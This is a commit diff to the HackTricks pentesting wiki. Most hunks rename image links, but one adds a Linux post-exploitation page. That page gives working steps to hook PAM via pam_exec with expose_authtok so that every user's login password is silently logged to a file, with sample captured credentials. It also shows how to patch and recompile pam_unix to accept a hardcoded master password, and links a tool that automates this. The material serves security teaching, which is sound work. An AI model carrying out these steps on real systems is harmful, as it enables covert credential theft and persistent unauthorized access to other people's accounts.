GitBook: [#3285] No subject

SUMMARY.md

@@ -79,7 +79,6 @@
 
 * [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
 * [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
-  * [PAM - Pluggable Authentication Modules](linux-hardening/privilege-escalation/pam-pluggable-authentication-modules.md)
   * [SELinux](linux-hardening/privilege-escalation/selinux.md)
   * [Logstash](linux-hardening/privilege-escalation/logstash.md)
   * [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md)
@@ -115,6 +114,8 @@
 * [Bypass Linux Shell Restrictions](linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
   * [DDexec](linux-hardening/bypass-linux-shell-restrictions/ddexec.md)
 * [Linux Environment Variables](linux-hardening/linux-environment-variables.md)
+* [Linux Post-Exploitation](linux-hardening/linux-post-exploitation/README.md)
+  * [PAM - Pluggable Authentication Modules](linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)
 
 ## 🍏 MacOS Hardening
 

cloud-security/atlantis.md

@@ -305,7 +305,7 @@ Moreover, if you don't have configured in the **branch protection** to ask to **
 
 This is the **setting** in Github branch protections:
 
-![](<../.gitbook/assets/image (375) (1) (1).png>)
+![](<../.gitbook/assets/image (375) (1) (1) (1).png>)
 
 ### Webhook Secret
 

linux-hardening/linux-post-exploitation/README.md

@@ -0,0 +1,135 @@
+# Linux Post-Exploitation
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>
+
+## Sniffing Logon Passwords with PAM
+
+Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check:
+
+{% content-ref url="pam-pluggable-authentication-modules.md" %}
+[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
+{% endcontent-ref %}
+
+First, we create a bash script that will be invoked whenever a new authentication occurs.
+
+```bash
+#!/bin/sh
+echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
+```
+
+The variables are PAM specific and will become available via the `pam_exec.so` module.
+
+Here is the meaning of the variables:
+
+* **$PAM\_USER:** The username that was entered.
+* **$PAM\_RHOST:** The remote host (typically the IP Address)
+* **$(cat -):** This reads `stdin`, and will contain the password that the script grabs
+* The results are piped into a log file at `/var/log/toomanysecrets.log`
+
+To **prevent all users from reading** the file consider pre-creating it and running `chmod`, e.g.:
+
+```bash
+sudo touch /var/log/toomanysecrets.sh
+sudo chmod 770 /var/log/toomanysecrets.sh
+```
+
+Next, the PAM configuration file needs to be updated the `pam_exec` module will be used to invoke the script.
+
+There are various config files located in `/etc/pam.d/`, and we pick `common-auth`.
+
+```
+sudo nano /etc/pam.d/common-auth
+```
+
+On the very bottom of the file, add the following authentication module:
+
+`auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh`
+
+The options have the following meaning:
+
+* **optional:** Authenticaiton shouldn’t fail if there is an error (it’s not a required step)
+* **pam\_exec.so:** This is the living off the land PAM module that can invoke arbitrary scripts
+* **expose\_authtok:** This is the trick that allows to read the password via `stdin`
+* **quiet:** Don’t show any errors to the user (if something doesn’t work)
+* The last argument is the shell script that was created previously
+
+![](<../../.gitbook/assets/image (375).png>)
+
+Finally, make the file executable:
+
+`sudo chmod 700 /usr/local/bin/toomanysecrets.sh`
+
+Now, let’s try this out and ssh from another machine, or login locally.
+
+And then look at the log file:
+
+```
+$ sudo cat /var/log/toomanysecrets.log
+ Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
+ Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
+ Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
+```
+
+### Backdooring PAM
+
+Let go to the sources of PAM (depends on your distro, take the same version number as yours..) and look around line numbers 170/180 in the pam\_unix\_auth.c file:
+
+```
+vi modules/pam_unix/pam_unix_auth.c
+```
+
+![](<../../.gitbook/assets/image (651).png>)
+
+Let’s change this by:
+
+![](<../../.gitbook/assets/image (638).png>)
+
+This will allow any user using the **password "0xMitsurugi"** to log in.
+
+Recompile the `pam_unix_auth.c`, end replace the pam\_unix.so file:
+
+```bash
+make
+sudo cp \  
+  /home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \  
+  /lib/x86_64-linux-gnu/security/  
+```
+
+{% hint style="info" %}
+You can automate this process with [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
+{% endhint %}
+
+## References
+
+* [https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)
+* [https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>

network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md

@@ -199,7 +199,7 @@ The desktop application **overrides these listeners** to implement the desktop a
 
 **Here is a simplified pseudocode:**
 
-![](<../../../.gitbook/assets/image (638) (2).png>)
+![](<../../../.gitbook/assets/image (638) (2) (1).png>)
 
 ![](<../../../.gitbook/assets/image (620).png>)
 

network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md

@@ -22,7 +22,7 @@ Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-o
 
 This code open http(s) links with default browser:
 
-![](<../../../.gitbook/assets/image (375) (1).png>)
+![](<../../../.gitbook/assets/image (375) (1) (1).png>)
 
 Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it.
 

pentesting-web/cors-bypass.md

@@ -333,7 +333,7 @@ You can have a service worker that will **flood the DNS cache to force a second
 2. Service worker floods DNS cache (the cached attacker server name is deleted)
 3. Second DNS request this time responded with 127.0.0.1
 
-![](<../.gitbook/assets/image (375).png>)
+![](<../.gitbook/assets/image (375) (1).png>)
 
 _Blue is the first DNS request and orange is the flood._
 
@@ -351,7 +351,7 @@ When the browser finds that the **domain isn't responding** to him, it will **us
 Note that in order to access localhost you should try to rebind 127.0.0.1 in Windows and 0.0.0.0 in linux.\
 Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
 
-<img src="../.gitbook/assets/image (638) (2) (1).png" alt="" data-size="original">
+<img src="../.gitbook/assets/image (638) (2) (1) (1).png" alt="" data-size="original">
 {% endhint %}
 
 ![](<../.gitbook/assets/image (620) (4).png>)

pentesting-web/h2c-smuggling.md

@@ -71,7 +71,7 @@ Follow this link for[ **more info about this vulnerability in Nginx**](../networ
 
 Similar to previous technique, this one **instead** of creating a **HTTP2 tunnel** to an endpoint accessible via a proxy, it will create a **Websocket tunnel** for the same purpose, **bypass potential proxies limitations** and talk directly to the endpoint:
 
-![](<../.gitbook/assets/image (651) (2).png>)
+![](<../.gitbook/assets/image (651) (2) (1).png>)
 
 ### Scenario 1
 

pentesting-web/xss-cross-site-scripting/README.md

@@ -152,7 +152,7 @@ Several web pages have endpoints that **accept as parameter the name of the func
 
 A good way to find out if something given directly by the user is trying to be executed is **modifying the param value** (for example to 'Vulnerable') and looking in the console for errors like:
 
-![](<../../.gitbook/assets/image (651).png>)
+![](<../../.gitbook/assets/image (651) (2).png>)
 
 In case it's vulnerable, you could be able to **trigger an alert** just doing sending the value: **`?callback=alert(1)`**. However, it' very common that this endpoints will **validate the content** to only allow letters, numbers, dots and underscores (**`[\w\._]`**).
 

reversing/cryptographic-algorithms/README.md

@@ -28,7 +28,7 @@ If you ends in a code **using shift rights and lefts, xors and several arithmeti
 
 If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
 
-![](<../../.gitbook/assets/image (375) (1) (1) (1).png>)
+![](<../../.gitbook/assets/image (375) (1) (1) (1) (1).png>)
 
 Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)